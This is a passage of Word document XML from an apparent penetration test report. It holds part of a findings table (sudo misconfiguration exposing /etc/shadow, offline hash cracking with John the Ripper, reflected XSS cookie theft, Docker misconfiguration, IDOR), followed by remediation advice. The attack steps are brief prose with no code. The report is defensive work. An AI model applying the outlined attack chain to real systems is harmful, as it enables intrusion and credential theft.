            <w:tcW w:w="2849" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="56EE18C3" w14:textId="744BD476"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Open redirect in next parameter</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="56" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0738E5E2"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2CD7B7F0"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6AB84BCD" w14:textId="67013054" w:rsidR="00222BDD" w:rsidRPr="00D77DFE" w:rsidRDefault="00812034" w:rsidP="005870BA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Vulnerability which may be chained with other phishing attacks</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1317" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3B40DA9A" w14:textId="7229D937"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5.4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00222BDD" w:rsidRPr="00D77DFE" w14:paraId="27B63C64" w14:textId="77777777" w:rsidTr="009E5B3F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="791" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="50AC2B2C" w14:textId="10FF0CB0"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12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2849" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="78010C17" w14:textId="79A03786"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Sudo misconfiguration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="56" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5B39CC75"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53659951"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7BB79914" w14:textId="760C44C3"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Allowed the tester to execute a shell which shows the last line from /etc/shadow</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1317" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4D78A09B" w14:textId="705617AE"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5.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00222BDD" w:rsidRPr="00D77DFE" w14:paraId="0A487FAF" w14:textId="77777777" w:rsidTr="009E5B3F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="791" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="123D843E" w14:textId="1A1528A1"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13</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2849" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5D06FFC9" w14:textId="44E18447"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Compromised credentials recovered from /etc/shadow</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="56" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="708FA3E0"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518EAAC1"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69399AFB" w14:textId="5D70E629"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By cracking the hash offline using john the ripper</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1317" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="61FB8C76" w14:textId="441D52D1"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5.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00222BDD" w:rsidRPr="00D77DFE" w14:paraId="74714DD8" w14:textId="77777777" w:rsidTr="009E5B3F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="791" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4C915D6D" w14:textId="3C0DF71D"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14</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2849" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7FB9F210" w14:textId="0EA571BD"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Reflected XSS via search input field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="56" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1B885D5B"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5972242E"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0AE2D46D" w14:textId="5CC2C989"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Leading to steal cookies from other users</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1317" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3AFC19A9" w14:textId="6626FA1F"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4.7</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00222BDD" w:rsidRPr="00D77DFE" w14:paraId="2DED31BF" w14:textId="77777777" w:rsidTr="009E5B3F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="791" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="21A6C995" w14:textId="59A231FA"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15</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2849" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="16900C88" w14:textId="2BDAC0CC"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Docker misconfiguration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="56" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2F3D881C"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669B77AE"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754B426C" w14:textId="7F81A802"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Leading to horizontal privilege escalation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1317" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="63401EDF" w14:textId="2160C53A"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4.5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00222BDD" w:rsidRPr="00D77DFE" w14:paraId="5D3A0B6C" w14:textId="77777777" w:rsidTr="009E5B3F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="791" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7BC64BDF" w14:textId="09246A3A" w:rsidR="00222BDD" w:rsidRPr="00D77DFE" w:rsidRDefault="00222BDD" w:rsidP="005870BA">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Calibri" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Calibri" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>16</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2849" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0159B36F" w14:textId="55AAD12A" w:rsidR="00222BDD" w:rsidRPr="00D77DFE" w:rsidRDefault="00222BDD" w:rsidP="005870BA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>IDOR in ascii_gallery.php</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="56" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="694561E5"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56" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="25C96D5A" w14:textId="77777777" w:rsidR="00222BDD" w:rsidRPr="00D77DFE" w:rsidRDefault="00222BDD" w:rsidP="005870BA">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="567"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Calibri" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3777" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3B74EEDC" w14:textId="31EC8F80" w:rsidR="00222BDD" w:rsidRPr="00D77DFE" w:rsidRDefault="00812034" w:rsidP="005870BA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Revealed admin content due to the information leakage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1317" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0FFC4D9C" w14:textId="2F3D2974" w:rsidR="00222BDD" w:rsidRPr="00D77DFE" w:rsidRDefault="00222BDD" w:rsidP="005870BA">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="567"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Calibri" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Calibri" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>4.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="09B99D91" w14:textId="77777777" w:rsidR="009D4A0A" w:rsidRPr="00D77DFE" w:rsidRDefault="009D4A0A" w:rsidP="009D4A0A">
      <w:pPr>
        <w:pStyle w:val="CambriaHeading1"/>
        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="520BE53C" w14:textId="77777777" w:rsidR="009D4A0A" w:rsidRPr="00D77DFE" w:rsidRDefault="009D4A0A" w:rsidP="009E5B3F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A084BF3" w14:textId="2F2196F3" w:rsidR="00FA5020" w:rsidRPr="00EA3D53" w:rsidRDefault="000C1F7F" w:rsidP="00EA3D53">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="166" w:name="_Toc223521146"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">6.9 </w:t>
      </w:r>
      <w:r w:rsidR="006F08D7" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Tester Notes and Recommendations</w:t>
      </w:r>
      <w:bookmarkEnd w:id="166"/>
    </w:p>
    <w:p w14:paraId="0A922F20" w14:textId="055D3F18" w:rsidR="003F04E6" w:rsidRPr="00D77DFE" w:rsidRDefault="00A6587D" w:rsidP="00A6587D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1287"/>
        <w:contextualSpacing w:val="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Calibri" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Calibri" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">1.  </w:t>
      </w:r>
      <w:r w:rsidR="003F04E6" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Calibri" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">Implement mandatory code reviews, static code analysis, and security testing before deployment. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E2C2A53" w14:textId="599006AF" w:rsidR="006F08D7" w:rsidRPr="00D77DFE" w:rsidRDefault="00A6587D" w:rsidP="00A6587D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1287"/>
        <w:contextualSpacing w:val="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Calibri" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Calibri" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r w:rsidR="003F04E6" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Calibri" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">Introduce automated scanning for SSTI, XSS, LFI, injection, insecure upload </w:t>
      </w:r>
      <w:r w:rsidR="00471C25" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Calibri" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">              </w:t>
      </w:r>
      <w:r w:rsidR="003F04E6" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Calibri" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>patterns, and hardcoded credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31980E50" w14:textId="77777777" w:rsidR="00A6587D" w:rsidRPr="00D77DFE" w:rsidRDefault="00A6587D" w:rsidP="00A6587D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1287"/>
        <w:contextualSpacing w:val="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Calibri" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Calibri" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">3.   </w:t>
      </w:r>
      <w:r w:rsidR="003F04E6" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Calibri" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>Apply server-side validation to all user-controlled inputs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0856566C" w14:textId="60522A67" w:rsidR="003F04E6" w:rsidRPr="00D77DFE" w:rsidRDefault="00A6587D" w:rsidP="00A6587D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1287"/>
        <w:contextualSpacing w:val="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Calibri" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Calibri" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">4.   </w:t>
      </w:r>
      <w:r w:rsidR="003F04E6" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Calibri" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>Remove all hardcoded credentials from application files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36D12633" w14:textId="32F8B7DA" w:rsidR="00FA5020" w:rsidRPr="00D77DFE" w:rsidRDefault="00A6587D" w:rsidP="001E5C24">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1287"/>
        <w:contextualSpacing w:val="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Calibri" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Calibri" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">5.   </w:t>
      </w:r>
      <w:r w:rsidR="003F04E6" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Calibri" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>Regenerate and rotate compromised SSH keys immediately.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08713DBD" w14:textId="77777777" w:rsidR="006B5228" w:rsidRPr="00D77DFE" w:rsidRDefault="006B5228" w:rsidP="00FA5020">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Calibri" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0087BD7E" w14:textId="3284C382" w:rsidR="006F08D7" w:rsidRPr="00D77DFE" w:rsidRDefault="000C1F7F" w:rsidP="009E5B3F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="167" w:name="_Toc223521147"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>6.</w:t>
      </w:r>
      <w:r w:rsidR="006923B6" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">10 </w:t>
      </w:r>
      <w:r w:rsidR="006F08D7" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Key Strengths and Weaknesses</w:t>
      </w:r>
      <w:bookmarkEnd w:id="167"/>
    </w:p>
    <w:p w14:paraId="2A13DC22" w14:textId="77777777" w:rsidR="00FA5020" w:rsidRPr="00D77DFE" w:rsidRDefault="00FA5020" w:rsidP="00C420B0">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Calibri" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="727D3208" w14:textId="4DBB6B65" w:rsidR="006F08D7" w:rsidRPr="00D77DFE" w:rsidRDefault="006F08D7" w:rsidP="00C420B0">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Calibri" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Calibri" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Strengths</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Calibri" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70D8DCDA" w14:textId="7596BB84" w:rsidR="006F08D7" w:rsidRPr="00D77DFE" w:rsidRDefault="003F04E6" w:rsidP="00585A7B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:contextualSpacing w:val="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Calibri" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Calibri" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>Effective Network Segmentation Practices</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7175897C" w14:textId="2FB8D73D" w:rsidR="003F04E6" w:rsidRPr="00D77DFE" w:rsidRDefault="003F04E6" w:rsidP="00585A7B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:contextualSpacing w:val="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Calibri" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Calibri" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>Logging and Monitoring Visibility</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A8929FB" w14:textId="62076E9E" w:rsidR="003F04E6" w:rsidRPr="00D77DFE" w:rsidRDefault="003F04E6" w:rsidP="00585A7B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:contextualSpacing w:val="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Calibri" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Calibri" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>Use of Role-Based Access Controls (RBAC)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="693CA128" w14:textId="03BCD76E" w:rsidR="003F04E6" w:rsidRPr="00D77DFE" w:rsidRDefault="003F04E6" w:rsidP="00585A7B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:contextualSpacing w:val="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Calibri" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Calibri" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>Containerization Adoption</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70B0AFD6" w14:textId="77777777" w:rsidR="003F04E6" w:rsidRPr="00D77DFE" w:rsidRDefault="003F04E6" w:rsidP="00C420B0">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Calibri" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A9D8BEF" w14:textId="77777777" w:rsidR="006F08D7" w:rsidRPr="00D77DFE" w:rsidRDefault="006F08D7" w:rsidP="00C420B0">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Calibri" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Calibri" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Weaknesses</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Calibri" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
